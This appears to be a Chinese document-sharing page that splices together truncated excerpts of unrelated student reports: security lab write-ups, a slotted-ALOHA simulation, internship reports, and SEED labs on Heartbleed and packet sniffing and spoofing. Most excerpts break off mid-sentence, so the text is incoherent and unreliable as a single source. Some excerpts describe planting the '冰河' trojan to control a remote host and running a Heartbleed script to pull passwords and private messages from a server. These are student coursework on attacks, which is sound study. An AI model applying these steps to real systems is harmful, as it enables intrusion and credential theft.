中南大学信息安全工程实验报告

合集下载

信息安全工程实验报告

信息安全工程实验报告

中南大学信息安全工程实验报告学生姓名学院信息科学与工程学院专业班级信息安全完成时间 2016年月日目录1. 实验1 (3)1.1 实验内容 (3)1.2 实验过程 (3)2.实验2 (7)2.1 实验内容 (7)2.2 实验过程 (7)3.实验3 (15)3.1 实验内容 (15)3.2 实验过程 (16)4.实验4 (23)4.1 实验内容 (23)4.2 实验背景 (23)4.3 实验过程 (25)5. 实验5 (36)5.1 实验内容 (36)5.2 实验过程 (36)6.实验6 (41)6.1 实验内容 (41)6.2 实验过程 (41)7.实验7 (48)7.1 实验内容 (48)7.2 实验背景 (48)7.3 实验过程 (49)8.实验8 (56)8.1 实验内容 (56)8.2 实验背景 (56)8.3 实验过程 (60)9.实验总结 (66)信息安全工程1.实验11.1 实验内容抓取ping和Telnet的数据报,并简要分析IP头的结构。

1.2 实验过程安装VMware并且打开已经配置好的虚拟机。

配置VMwre虚拟机:为了使所有的网络安全攻击实验都可以成功完成,在虚拟上安装没有打过任何补丁的Windows Advanced Server2000。

启动成功后,进入操作系统,配置虚拟机上操作系统的IP地址,之前查询得到物理主机IP地址为192.168.1.3,使之和主机能够通过网络进行通信,配置虚拟机操作系统的IP地址应与物理主机在同一网段,实验设为:192.168.1.43利用Ping指令来测试网络是否连通。

在主机的DOS窗口中输入“Ping 192.168.1.3”,ping通截图如下:利用wireshark抓包:Ping之前打开wireshark软件,点击开始抓包,找到主机间通信的数据包信息如下:开启Telnet服务:Telnet给用户提供了一种通过网络登录远程服务器的方式,通过端口23工作。

中南大学计算机网络实验报告

中南大学计算机网络实验报告

计算机网络实验报告专业班级:信息安全1202班指导老师:王伟平姓名:学号:0909122824实验一分槽ALOHA协议仿真实验【实验目的】1.掌握VB、VC++、VS或JA V A等集成开发环境编写仿真程序的方法;2.理解并掌握分槽ALOHA协议原理。

【实验内容】编写仿真程序,对一定网络环境下MAC层的多路访问协议的分槽ALOHA协议进行实现。

通过仿真,学习协议采取的介质访问管理,包括介质分配和冲突解决机制,并对协议的性能与理论结果进行比较分析。

【编程语言和环境】1.编程语言C/C++/C#/Java/Matlab等均可;2.编程环境Windows(MS Visual系列,VC/VB/;)和Linux(编辑器vi+编译器GCC)均可;【实验原理】用于在多路访问信道上确定下一个使用者的协议属于数据链路层的一个子层,称为介质访问控制(Medium Access Control,MAC)子层,许多局域网都使用多路访问信道作为它的通信基础。

最简单的信道分配方案是FDM(为每个站专门分配一段频率)和TDM(为每个站分配一个时槽),当站的数量比较大而且可变,或者流量具有突发性变化的时候,就需要用到纯ALOHA协议或分槽ALOHA协议。

分槽ALOHA的基本思想是把信道时间分成离散的时间槽,槽长为一个帧所需的发送时间,站点在时槽开始时发送。

如果冲突,那么间隔一定时间后重新发送。

主要过程是设置各站点初始产生包的时间点及产生包的时间间隔(均为随机值),得到所有站点成功发送10000个数据包的总时间以及这段时间内所有数据包的个数(包括各站点每次新产生的包以及由于冲突而重发的包),从而计算出每包时内尝试次数及其对应的吞吐量。

【流程图】【关键代码说明】1.初始化时槽:time t = new time();t.setN(i); //第N 个时槽2.初始化站点:AlohaThread at1 = new AlohaThread(sp1,j,a);//开始发送时间private long start;//时间间隔private long d;3.若此时槽只有一个数据包,则发送成功;若有两个以上数据包,则冲突。

信息安全实验总结报告

信息安全实验总结报告

信息安全实验总结报告信息安全实验总结报告篇一:信息安全实验报告课程名称:信息安全实验名称:共五次实验班级:姓名:同组人:指导教师评定:签名:实验一木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

二、实验原理木马的全称为特洛伊木马,源自古希腊神话。

木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。

它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。

1.木马的特性(1)伪装性 (2)隐藏性 (3)破坏性(4)窃密性2.木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。

3.木马的种类(1)按照木马的发展历程,可以分为4个阶段:第1代木马是伪装型病毒,第2代木马是网络传播型木马,第3代木马在连接方式上有了改进,利用了端口反弹技术,例如灰鸽子木马,第4代木马在进程隐藏方面做了较大改动,让木马服务器端运行时没有进程,网络操作插入到系统进程或者应用进程中完成,例如广外男生木马。

(2)按照功能分类,木马又可以分为:破坏型木马,主要功能是破坏并删除文件;服务型木马; DoS攻击型木马;远程控制型木马三、实验环境两台运行Windows 2000/XP的计算机,通过网络连接。

使用“冰河”和“广外男生”木马作为练习工具。

四、实验内容和结果任务一“冰河”木马的使用1.使用“冰河”对远程计算机进行控制我们在一台目标主机上植入木马,在此主机上运行G_Server,作为服务器端;在另一台主机上运行G_Client,作为控制端。

打开控制端程序,单击快捷工具栏中的“添加主机”按钮,弹出如图1-5所示对对话框。

信息安全实验报告

信息安全实验报告

信息安全实验报告一、实验目的随着信息技术的飞速发展,信息安全问题日益凸显。

本次实验的目的在于深入了解信息安全的重要性,通过实际操作和分析,掌握常见的信息安全攻击与防御手段,提高对信息安全风险的识别和应对能力。

二、实验环境本次实验在以下环境中进行:1、操作系统:Windows 10 专业版2、应用软件:Wireshark 网络协议分析工具、Metasploit 渗透测试框架、Nmap 网络扫描工具等3、网络环境:实验室内部局域网三、实验内容(一)网络扫描与漏洞探测使用 Nmap 工具对目标网络进行扫描,获取网络中的主机信息、开放端口和服务等。

通过分析扫描结果,发现了一些潜在的安全漏洞,如某些主机开放了不必要的端口,可能会被攻击者利用。

(二)密码破解实验选取了一些常见的密码加密算法,如 MD5、SHA-1 等,使用相应的破解工具进行密码破解实验。

结果表明,简单的密码容易被快速破解,强调了设置复杂密码的重要性。

(三)网络嗅探与数据包分析利用 Wireshark 工具进行网络嗅探,捕获网络中的数据包。

对捕获的数据包进行详细分析,包括源地址、目的地址、协议类型、数据内容等。

通过分析发现了一些异常的网络流量,如大量的广播包可能是网络攻击的前奏。

(四)SQL 注入攻击实验搭建了一个简单的 Web 应用程序,并尝试进行 SQL 注入攻击。

成功地通过输入恶意的 SQL 语句获取了数据库中的敏感信息,揭示了Web 应用中 SQL 注入漏洞的严重威胁。

(五)缓冲区溢出攻击实验通过编写特定的程序,尝试进行缓冲区溢出攻击。

了解了缓冲区溢出攻击的原理和危害,以及如何通过合理的编程和安全机制来防范此类攻击。

四、实验结果与分析(一)网络扫描与漏洞探测结果分析Nmap 扫描结果显示,部分主机存在开放端口过多、服务版本过低等问题。

这些漏洞可能被黑客利用进行进一步的攻击,如端口扫描、服务漏洞利用等。

(二)密码破解实验结果分析简单的密码如“123456”、“password”等在短时间内就被破解,而复杂的密码如包含大小写字母、数字和特殊字符的组合则具有较高的安全性。

中南大学网络安全课外实验报告心脏滴血

中南大学网络安全课外实验报告心脏滴血

中南大学CENTRAL SOUTH UNIVERSITY《SEED PROJECT》实验报告学生姓名孙毅学号 0906140106指导教师王伟平学院信息科学与工程专业班级信安1401完成时间2016.12目录一、实验原理 (1)二、实验过程 (2)三、实验结果以及讨论 (5)Heartbleed Attack一、实验原理Heartbleed bug (CVE-2014-0160)是旧版本的Openssl库中一个的一个漏洞。

利用这个漏洞,攻击者可以从服务器里窃取一部分随机数据。

这个漏洞主要是源于Openssl设计的协议继承了Heartbeat协议,使用SSL/TLS来保持连接的实时性、保活性。

原理示意图如下:二、实验过程首先要按照指导进行如下操作:访问您的浏览器https://。

登录网站管理员。

(用户名:admin密码:seedelgg;)增加朋友。

(去更多->点击波比->添加朋友),然后发送私人消息。

在您已经做了足够的互动作为合法用户,你可以发动攻击,看看你可以从受害者服务器上得到什么信息。

编写程序从零开始推出Heartbleed攻击是不容易的,因为它需要的心跳协议底层的知识。

幸运的是,其他人已经写了攻击代码。

因此,我们将使用现有的代码来获得在Heartbleed攻击的第一手经验。

我们使用的代码称为attack.py,原本是Jared Stafford写的。

我们对教育目的的代码做了一些小的修改。

您可以从实验室的网站上下载代码,更改其权限,所以该文件是可执行的。

然后,您可以运行攻击代码如下:$ / attack.py 。

您可能需要多次运行攻击代码以获取有用的数据。

尝试,看看是否可以从目标服务器获取以下信息。

用户名和密码。

用户活动(用户所做的)。

私人信息的确切内容。

在这个任务中,学生将比较良性包和被攻击者发送的代码发送的恶意数据包的去发现Heartbleed漏洞的根本原因。

Heartbleed攻击是基于heartbeatrequest。

信息安全工程实训报告

信息安全工程实训报告

一、实训背景与目的随着信息技术的飞速发展,信息安全问题日益凸显。

为了提高我国信息安全人才的培养质量,增强学生的实际操作能力,我校组织了信息安全工程实训。

本次实训旨在使学生了解信息安全的基本理论,掌握信息安全技术的实际应用,培养学生的信息安全意识,提高其在网络安全、数据保护、系统安全等方面的实践能力。

二、实训内容与过程(一)实训内容1. 网络安全基础- 学习网络协议与体系结构- 网络安全防护技术- 网络攻击与防御手段2. 操作系统安全- Windows、Linux操作系统的安全配置- 操作系统漏洞分析与修复- 权限管理与访问控制3. 数据库安全- 常见数据库系统(如MySQL、Oracle)的安全配置- 数据库安全漏洞分析与防护- 数据备份与恢复4. 应用系统安全- 常见Web应用的安全漏洞分析- Web应用防火墙与入侵检测系统- 移动应用安全5. 信息安全实践- 网络攻防演练- 系统安全评估- 安全事件应急响应(二)实训过程1. 理论学习实训开始前,我们通过查阅教材、资料和参加讲座,对信息安全的基本理论进行了系统学习。

2. 实验操作在实训过程中,我们按照实训指导书的要求,进行了各项实验操作,包括网络安全配置、操作系统安全加固、数据库安全防护等。

3. 实践项目我们参与了多个实践项目,如网络安全攻防演练、系统安全评估等,通过实际操作,加深了对信息安全技术的理解。

4. 小组讨论在实训过程中,我们定期进行小组讨论,分享学习心得和实验经验,互相学习,共同进步。

三、实训成果与收获(一)实训成果1. 掌握了信息安全的基本理论和技术2. 熟悉了各种安全工具和软件的使用3. 提高了网络安全防护和应急响应能力4. 培养了团队合作精神和沟通能力(二)实训收获1. 增强了信息安全意识,认识到信息安全的重要性2. 提高了实践能力,为今后的工作奠定了基础3. 了解了信息安全行业的现状和发展趋势4. 结识了一群志同道合的朋友,共同进步四、总结与展望通过本次信息安全工程实训,我们不仅学到了丰富的信息安全知识,还提高了实践能力。

信息安全专业实习报告

信息安全专业实习报告

信息安全专业实习报告信息安全专业实习报告(精选11篇)接地气的实习生活已经告一段落,这次实习让你心中有什么感想呢?如果我们能够写好实习报告,可以收获更多。

是不是无从下笔、没有头绪?下面是店铺精心整理的信息安全专业实习报告(精选11篇),仅供参考,欢迎大家阅读。

信息安全专业实习报告篇1实习时间:20xx年x月x日-x月x日实习地点:xx实习过程及体会:我是xxx计算机职业技术学院信息安全专业的学生,去年xx月份从学校出来后,我来到xxx网站开始自已为期xx个月的实习工作,在这几个月的实习工作中,我主要负责网站编辑工作,在工作中,我学到和领悟到很多东西,实习期间,我努力将自己在校学习的理论知识向实践方面转化,尽量做到理论和实际相结合。

在实习期间,能遵守工作纪律,不迟到,不早退,认真完成领导交给的工作。

我做的是网站的新闻编辑工作,负责把一些收集来的新闻进行加工和编辑,再放到网站上供网友阅读。

这个网站是附属于xx区xx书店集团公司的,是集团里的一个媒体,所以还有网站上也有一些集团内部的新闻。

我就负责去采集新闻材料,撰写新闻稿。

因为是读书网站,面向大众,所以还要在网站上进行新书推荐,把书的内容编辑后放到网站上供书友阅读。

此网站还有论坛和博客板块,我也负责在里面发发贴,自己写一些文章放到博学客习上网面。

实习期间,我利用此次难得的机会,努力工作,认真学习,严格要求自己,虚心向领导请教。

其实我们大一学习的多为基础课,专业课程还没开课,但是这些网站上一般的工作都还能应付。

在工作中,我提高自己运用word,excel等常用软件的能力,学会如何去采集资料和撰写写作新闻稿,提高自己的文字运用能力和写作水平。

“纸上得来终觉浅,绝知此事要躬行。

”在短暂的实习过程中,我深深的感觉到自己所学知识的肤浅和在实际运用中的专业知识的匮乏,刚开始的一段时间里,对一些工作感到无从下手,茫然不知所措。

在学校总以为自己学的不错,一旦接触到实际,才发现自己知道的是多么少,这时才真正领悟到“学无止境”的含义。

中南大学操作系统实验报告

中南大学操作系统实验报告

中南大学操作系统实验报告操作系统实验报告学生姓名王朝晖学号 0906160216 专业班级信息安全 1602 指导教师宋虹学院信息科学与工程学院完成时间 20__ 年 5 月 27 日目录(格式二) 目录一操作系统模拟实验概述 ...................................................... ......................................................... ..........1(一)实验目的 ...................................................... .............................................1(二)实验内容及要求 ...................................................... .................................11.实验要求 ............................................................................................................... .....................1 (三)实验过程及分析 ...................................................... .................................2初步设计 ...................................................... ......................................................... .........................2 详细设计 ...................................................... ......................................................... .........................2 结束语 ...................................................... ......................................................... .............................................6 (附件)程序代码 ...................................................... ......................................................... .........................7 Windows 安全实验 ...................................................... ......................................................... ........................41 使用 Microsoft 基准安全分析器 MBSA 2.3 对系统进行安全评估 ...............41设置 Windows 的安全模式,配置本地安全策略,包括以下内容 ................41Linu_ 安全实验 ...................................................... ......................................................... .............................48 扩展安全实验 ...................................................... ......................................................... ...............................66 1.修改 ssh 默认连接 22 端口和添加防火墙 firewalld 通过端口 ...................................66 2.禁止 root 帐号直接登录 ...................................................... .................................................67 3.安装 DenyHosts 【拦截获取攻击的 IP ,生成黑名单,防止再次攻击】.......................70第 1 页共 40 页一一操作系统模拟实验概述(一)实验目的本项目完成一个小型的操作系统进程调度、内存动态分配的仿真程序。

信息安全实训课实验报告

信息安全实训课实验报告

一、实验背景随着信息技术的飞速发展,信息安全已成为当今社会关注的焦点。

为了提高我国信息安全水平,培养具备信息安全专业技能的人才,我国高校纷纷开设信息安全实训课程。

本实验报告旨在记录我在信息安全实训课程中的实验过程、实验结果以及实验心得。

二、实验目的1. 了解信息安全的基本概念和原理;2. 掌握信息安全实训课程中常用工具的使用方法;3. 提高信息安全防护意识和实际操作能力;4. 为今后从事信息安全工作打下坚实基础。

三、实验内容1. 实验一:操作系统安全配置(1)实验目的:掌握Windows操作系统的安全配置方法,提高系统安全性。

(2)实验步骤:1)检查操作系统版本,确保系统已安装最新补丁;2)关闭不必要的服务,减少系统攻击面;3)设置强密码策略,提高账户安全性;4)启用防火墙,防止恶意攻击;5)开启系统日志,便于安全事件追踪。

(3)实验结果:成功完成操作系统安全配置,提高了系统安全性。

2. 实验二:网络扫描与漏洞检测(1)实验目的:掌握网络扫描与漏洞检测工具的使用方法,发现潜在安全风险。

(2)实验步骤:1)使用Nmap进行网络扫描,获取目标主机信息;2)使用Nessus进行漏洞检测,发现目标主机存在的安全漏洞;3)针对发现的安全漏洞,提出相应的修复建议。

(3)实验结果:成功发现目标主机存在的安全漏洞,为后续修复工作提供依据。

3. 实验三:入侵检测与防范(1)实验目的:掌握入侵检测与防范工具的使用方法,提高网络安全防护能力。

(2)实验步骤:1)使用Snort进行入侵检测,监控网络流量;2)根据检测到的入侵行为,制定相应的防范措施;3)使用iptables进行网络安全策略配置,限制非法访问。

(3)实验结果:成功识别入侵行为,并采取相应措施,保障网络安全。

4. 实验四:加密与数字签名(1)实验目的:掌握加密与数字签名技术,提高信息安全防护水平。

(2)实验步骤:1)使用OpenSSL进行对称加密,保护数据传输安全;2)使用OpenSSL进行非对称加密,实现数字签名;3)验证数字签名,确保数据来源可靠性。

信息安全工程实验报告一p

信息安全工程实验报告一p
熟悉信息安全工程规划的内容。
四.实验要求及实验软硬件环境
【实验环境】
Windows操作系统主机一台。
能够连接互联网。
【实验组织方式】
个人独立完成
五.实验步骤和内容
根据ISSE信息安全过程的五个阶段,规划某单位的信息安全过程建设计划和内容
一、前言
随着国内计算机和网络技术的迅猛发展和广泛普及,企业经营活动的各种业务系统都立足于Internet/Intranet环境中。但随之而来的安全问题也在困扰着用户。Internet所具有的开放性、国际性和自由性在增加应用自由度的同时,对安全提出了更高的要求。一旦网络系统安全受到严重威胁,甚至处于瘫痪状态,将会给企业、社会、乃至整个国家带来巨大的经济损失。应此如何使企业信息网络系统免受黑客和病毒的入侵,已成为信息事业健康发展所要考虑的重要事情之一。
ES-8503万兆核心路由交换机具有一下的优点:
先进的系统架构:采用了分布式、模块化设计理念,并采用了基于多处理器分布式处理机制和Crossbar空分交换结构的体系结构。这保证了系统优异的转发性能、强大的业务能力和高度的可扩展性。
高端口密度和线速路由及交换:具有丰富的接口类型,提供10GE、GE、FE等接口。可以真正实现高端口密度和线速路由及交换。
电信级可靠性:系统的主控单元、电源等等关键模块均可以进行1:1方式的备份,无中断保护系统(Hitless Protection System - HPS)为DES-8500的高可靠性提供了最重要的保证,在配置冗余控制模块的情况下,它能满足最苛刻的可靠性要求。同时,DES-8500的VRRP、STP、LACP等功能为用户提供了进一步的可靠性保证。
强大的安全功能:支持ACL安全过滤机制,可提供基于用户、地址、应用以及端口级的安全控制功能,并支持IPSec、MPLS VPN特性。同时,支持基于端口不同优先级对列的和基于流的入口和出口带宽限制、uRPF、防DDOS攻击、安全管理、接入认证及透传,VLAN ID与MAC地址、端口号、IP地址捆绑等安全功能。此外,系统还具备完善的抗病毒机制,可以为网络运营提供全面的安全保证。

信息安全实习报告总结(3篇)

信息安全实习报告总结(3篇)

第1篇一、前言随着信息技术的飞速发展,信息安全已成为我国国家安全和社会稳定的重要组成部分。

为了提高自身在信息安全领域的专业素养,我于近期在一家知名信息安全公司进行了为期三个月的实习。

以下是我在实习期间的学习、工作及收获的总结。

二、实习单位及岗位介绍实习单位:XX信息安全公司公司简介:XX信息安全公司是一家专注于信息安全技术研发、产品销售和服务的国家级高新技术企业。

公司业务涵盖网络安全、数据安全、应用安全等多个领域,致力于为客户提供全方位、多层次的信息安全解决方案。

实习岗位:信息安全工程师岗位职责:1. 负责公司产品的安全测试和漏洞分析;2. 参与公司项目的安全设计和实施;3. 跟踪国内外信息安全动态,收集和整理相关技术资料;4. 协助完成公司信息安全产品的研发和测试工作。

三、实习内容及过程1. 入职培训在实习初期,公司安排了为期一周的入职培训。

培训内容包括公司文化、业务介绍、安全知识普及等。

通过培训,我对公司的业务有了初步的了解,为后续实习工作打下了基础。

2. 安全测试与漏洞分析在实习过程中,我主要参与了安全测试和漏洞分析工作。

具体内容包括:(1)使用各种安全工具对软件、系统进行渗透测试,发现潜在的安全漏洞;(2)针对发现的安全漏洞,进行深入分析,评估其风险等级;(3)编写漏洞报告,提交给相关部门进行修复;(4)跟踪漏洞修复进度,确保漏洞得到有效解决。

3. 项目参与在实习期间,我参与了多个信息安全项目的实施。

具体工作如下:(1)参与项目需求分析,了解客户的安全需求;(2)协助项目团队成员进行安全设计,确保项目安全可靠;(3)参与项目实施过程,对项目安全风险进行监控和预警;(4)协助完成项目验收,确保项目符合安全要求。

4. 技术研究为了提高自身技术水平,我利用业余时间进行了以下技术研究:(1)学习网络安全基础知识,如网络协议、加密算法等;(2)关注国内外信息安全动态,了解新兴安全技术和攻击手段;(3)研究安全工具的使用,提高安全测试和漏洞分析能力;(4)学习编程语言,为安全研究提供技术支持。

信息安全实验实验报告

信息安全实验实验报告

一、实验目的本次实验旨在通过实践操作,加深对信息安全基础知识的理解,提高对网络安全问题的防范意识,掌握常见的网络安全防护技术。

二、实验环境操作系统:Windows 10实验工具:Wireshark、Nmap、Metasploit、Kali Linux等三、实验内容1. 网络嗅探实验(1)实验目的:了解网络嗅探原理,掌握Wireshark的使用方法。

(2)实验步骤:① 使用Wireshark抓取本机所在网络中的数据包;② 分析数据包,观察网络流量,识别常见协议;③ 分析网络攻击手段,如ARP欺骗、DNS劫持等。

2. 端口扫描实验(1)实验目的:了解端口扫描原理,掌握Nmap的使用方法。

(2)实验步骤:① 使用Nmap扫描本机开放端口;② 分析扫描结果,识别高风险端口;③ 学习端口扫描在网络安全中的应用。

3. 漏洞扫描实验(1)实验目的:了解漏洞扫描原理,掌握Metasploit的使用方法。

(2)实验步骤:① 使用Metasploit扫描目标主机漏洞;② 分析漏洞信息,评估风险等级;③ 学习漏洞扫描在网络安全中的应用。

4. 恶意代码分析实验(1)实验目的:了解恶意代码特点,掌握恶意代码分析技术。

(2)实验步骤:① 使用Kali Linux分析恶意代码样本;② 识别恶意代码类型,如木马、病毒等;③ 学习恶意代码分析在网络安全中的应用。

四、实验结果与分析1. 网络嗅探实验通过Wireshark抓取网络数据包,发现网络流量中存在大量HTTP请求,其中部分请求包含敏感信息,如用户名、密码等。

这表明网络中存在信息泄露风险。

2. 端口扫描实验使用Nmap扫描本机开放端口,发现22号端口(SSH)和80号端口(HTTP)开放,存在安全风险。

建议关闭不必要的端口,加强网络安全防护。

3. 漏洞扫描实验使用Metasploit扫描目标主机漏洞,发现存在高危漏洞。

针对这些漏洞,应及时修复,降低安全风险。

4. 恶意代码分析实验通过分析恶意代码样本,识别出其为木马类型,具有远程控制功能。

信息安全专业实习报告总结

信息安全专业实习报告总结

一、实习背景随着互联网技术的飞速发展,信息安全已成为我国国家战略的重要组成部分。

为了培养具备信息安全专业知识和实践能力的人才,我国众多高校开设了信息安全专业。

本人作为一名信息安全专业的学生,于XX年XX月至XX年XX月在XX公司进行了为期XX个月的实习。

通过这次实习,我对信息安全行业有了更加深入的了解,同时也提高了自己的专业技能和综合素质。

二、实习单位及岗位实习单位:XX公司岗位:信息安全工程师实习生三、实习内容1. 安全风险评估在实习期间,我参与了公司内部网络的安全风险评估工作。

首先,我学习了风险评估的相关知识,包括风险评估的流程、方法和工具。

然后,在导师的指导下,我对公司内部网络进行了全面的调查,收集了网络架构、系统配置、安全设备等信息。

接着,我运用风险评估工具对网络进行了安全评估,发现了存在的一些安全隐患,如弱口令、过时补丁、权限设置不合理等。

最后,我根据评估结果提出了相应的安全整改建议,并协助相关部门进行了整改。

2. 网络安全监控实习期间,我还参与了公司网络安全监控工作。

我学习了网络安全监控的基本原理,包括入侵检测、漏洞扫描、流量分析等。

在导师的指导下,我负责对公司的网络安全设备进行配置和维护,确保其正常运行。

同时,我还负责收集和分析网络安全日志,及时发现和处理安全事件。

3. 安全应急响应在实习过程中,我参与了公司安全应急响应工作。

当发生安全事件时,我协助导师进行事件分析、溯源和处置。

通过这次实习,我学会了如何处理安全事件,提高了自己的应急处理能力。

4. 安全意识培训为了提高公司员工的安全意识,我还参与了公司安全意识培训工作。

我负责收集整理安全培训资料,并协助导师进行培训。

通过培训,员工的安全意识得到了提高,有利于公司整体安全水平的提升。

四、实习收获1. 知识储备通过实习,我对信息安全行业有了更加深入的了解,掌握了网络安全、安全评估、安全应急响应等方面的知识和技能。

同时,我还学习了安全意识培训、安全设备配置与维护等方面的知识。

中南大学网络安全课外实验报告嗅探与欺骗

中南大学网络安全课外实验报告嗅探与欺骗

中南大学CENTRAL SOUTH UNIVERSITY《SEED PROJECT》实验报告学生姓名孙毅学号 **********指导教师王伟平学院信息科学与工程专业班级信息安全1401成时间2016.12目录一、实验原理 (1)二、实验器材 (1)三、实验步骤及运行结果 (1)Task1.编写嗅探程序 (1)Task2.包欺骗 (3)Task3:综合使用 (4)四、附件 (4)Task1 (5)Task2 (13)Task3 (17)Sniffing_Spoofing一、实验原理Sniffing就是一种能将本地网卡状态设成‘混杂’状态的模式,当网卡处于这种“混杂”方式时,该网卡具备“广播地址”,它对遇到的每一个帧都产生一个硬件中断以便提醒操作系统处理流经该物理媒体上的每一个报文包。

(绝大多数的网卡具备置成混杂模式的能力)一般来说,sniffing和poofing会联合起来使用。

当攻击者嗅探到关键信息时,通常会使用poofing技术来构造数据包来劫持会话或者去获取更多信息,通常会造成很大的危害。

Poofing技术就是攻击者自己构造数据包的ip/tcp数据包帧头部数据来达到自己的目的。

本次实验就是基于以上原理,在linux下模拟整个过程。

二、实验器材1.Ubuntu12.04。

2.Wireshark等常用捕包工具。

三、实验步骤及运行结果Task1.编写嗅探程序嗅探程序可以很容易地使用pcap库。

利用PCAP,嗅探器的任务变得在pcap 库调用一系列简单的程序。

在序列结束时,数据包将被放置在缓冲区中,以进一步处理,只要它们被捕获。

所有的数据包捕获的细节由pcap库处理。

Tim Carstens写了一个教程如何使用pcap库写的嗅探程序。

1:深入理解并可以编写嗅探程序。

2:编写过滤器。

请为您的嗅探程序捕捉每个写过滤表达式如下。

在你的实验报告,你需要包括screendumps显示应用这些过滤器的结果。

•捕获ICMP数据包。

信息安全实训综合报告范文

信息安全实训综合报告范文

一、引言随着互联网技术的飞速发展,信息安全问题日益突出,信息安全已成为我国网络安全战略的重要组成部分。

为了提高我国信息安全人才的素质,培养具备实战能力的专业人才,我校开展了信息安全实训课程。

本文将对我校信息安全实训课程的开展情况进行总结,并对实训过程中取得的成果和存在的问题进行分析。

二、实训课程概述1. 实训目标(1)使学生掌握信息安全基本概念、原理和技术;(2)培养学生具备信息安全防护、漏洞扫描、应急响应等实战能力;(3)提高学生团队协作、沟通和创新能力。

2. 实训内容(1)信息安全基础知识:密码学、网络安全、操作系统安全、数据库安全等;(2)信息安全防护技术:防火墙、入侵检测、漏洞扫描、入侵防御等;(3)信息安全实战演练:网络攻防、应急响应、数据恢复等;(4)信息安全项目管理:项目规划、实施、监控和评估。

三、实训过程1. 实训准备(1)制定详细的实训计划,明确实训目标、内容、进度和要求;(2)配备实训设备和软件,确保实训环境满足教学需求;(3)邀请企业专家担任实训导师,提供实战指导。

2. 实训实施(1)基础知识学习:通过课堂讲授、实验操作等方式,使学生掌握信息安全基础知识;(2)实战技能训练:通过模拟实战环境,让学生进行漏洞扫描、入侵检测、应急响应等实战操作;(3)项目实践:引导学生参与信息安全项目,培养项目规划、实施、监控和评估能力。

3. 实训总结(1)组织学生进行实训成果展示,分享实训经验和心得;(2)对实训过程进行总结,分析实训效果和存在的问题;(3)对实训导师进行评估,为今后实训工作提供参考。

四、实训成果1. 学生技能提升:通过实训,学生掌握了信息安全基本概念、原理和技术,具备了一定的实战能力;2. 团队协作能力增强:实训过程中,学生学会了与他人沟通、协作,提高了团队协作能力;3. 项目管理能力提升:学生通过参与项目实践,掌握了项目规划、实施、监控和评估的方法。

五、存在问题及改进措施1. 问题(1)实训内容与实际需求存在一定差距;(2)实训设备更新换代较快,部分设备已无法满足实训需求;(3)实训师资力量不足,部分实训导师实战经验不足。

中南大学网络安全实验报告终极版

中南大学网络安全实验报告终极版

网络安全实验汇总报告姓名曾鑫学号**********专业班级信息安全1602班指导教师王伟平学院信息科学与工程学院完成时间2018年5月30日目录实验一网络流量捕获实验 (3)1 被动网络流量捕获 (3)1.1.3 抓包原理 (3)1.2 捕获数据与分析 (7)2 主动网络流量捕获 (9)2.4 Kali使用ettercap实现ARP欺骗 (11)实验二TCP/IP协议攻击 (17)任务一ARP缓存中毒 (17)任务二ICMP重定向攻击 (22)任务三SYN泛洪攻击 (25)任务四TCP RST攻击TELNET和SSH连接 (29)任务五TCP RST攻击视频流应用程序 (32)任务六ICMP盲连接重置和报源抑制 (35)任务七TCP会话劫持 (37)实验三CA证书与SSL连接 (39)实验四(1)配置和管理主机防火墙 (57)实验四(2)使用防火墙防止DOS攻击 (66)实验五 WIFI钓鱼 (71)实验六综合扫描实验 (75)实验七 XSS跨站脚本攻击 (81)实验八 SQL注入攻击 (93)实验一网络流量捕获实验1 被动网络流量捕获(因实验一交过一份报告,为节省篇幅,只截取部分重要的内容)1.1 数据抓包工具——Wireshark1.1.1 软件概述(略)1.1.2 工作流程(略)1.1.3 抓包原理1.网络原理(哪种网络情况能够抓到包?)(1)本机环境:直接抓包本机网卡进出的流量。

如下图所示,在本机安装Wireshark,绑定网卡,不需要借助交换机、集线器、路由器等第三方设备,抓取本机电脑网卡上进出的流量,这是一种最基本的抓包方式。

(2)集线器环境:流量防洪,同一冲突域,集线器会做防洪,用户连接到同一集线器是同一冲突域。

如下图所示,三台电脑PC1、PC2、PC3通信,PC1装有Wireshark,三台电脑连接到同一台集线器,集线器属于物理层产品,看不懂MAC地址和IP地址,处理方式对除了接受包的源端口的其他所有端口防洪,可以抓到同一集线器其他电脑发送过来的数据包,这是一种比较典型的被淘汰的老网络拓扑结构。

信息安全实验报告总结

信息安全实验报告总结

信息安全实验报告总结信息安全实验是一门重要的实践课程,旨在通过实际操作来提升学生的信息安全意识和技能。

本次实验我主要学习了渗透测试、漏洞扫描和网络攻防等内容,对信息安全有了更深入的了解和体验。

通过实验,我对信息安全的重要性有了更深刻的认识,并且掌握了一些基本的信息安全防护措施。

首先,我学习了渗透测试的基本概念和原理。

渗透测试是通过模拟黑客攻击的方式,测试系统和网络的安全性。

在实验中,我们使用了一些常用的渗透测试工具,例如Nessus、Metasploit等,对指定的目标系统进行了渗透测试。

通过实验,我了解到了渗透测试的流程和方法,以及常见的漏洞类型和防护措施。

这些知识对于我以后从事信息安全相关工作具有重要的指导意义。

其次,我学习了漏洞扫描的基本原理和方法。

漏洞扫描是通过扫描目标系统的漏洞,发现系统中存在的安全隐患。

在实验中,我们使用了一些常用的漏洞扫描工具,例如OpenVAS、Nexpose等,对目标系统进行了漏洞扫描。

通过实验,我了解到了漏洞扫描的原理和流程,以及常见的漏洞类型和修复方法。

这些知识对于我在以后的工作中进行系统安全检测和漏洞修复非常有帮助。

最后,我学习了网络攻防的基本概念和技术。

网络攻防是指对网络系统进行攻击和防御的过程。

在实验中,我们通过搭建实验环境,模拟了一些常见的网络攻击和防御场景,例如DDoS攻击、防火墙设置等。

通过实验,我了解到了网络攻防的基本原理和方法,以及常见的攻击技术和防护措施。

这些知识对于我在以后的工作中进行网络安全防护具有重要的作用。

通过本次实验,我不仅掌握了一些信息安全工具和技术,还提高了我的动手能力和解决问题的能力。

在实验过程中,我遇到了一些困难和挑战,但通过和同学的讨论和老师的指导,我成功地克服了困难,取得了实验的预期效果。

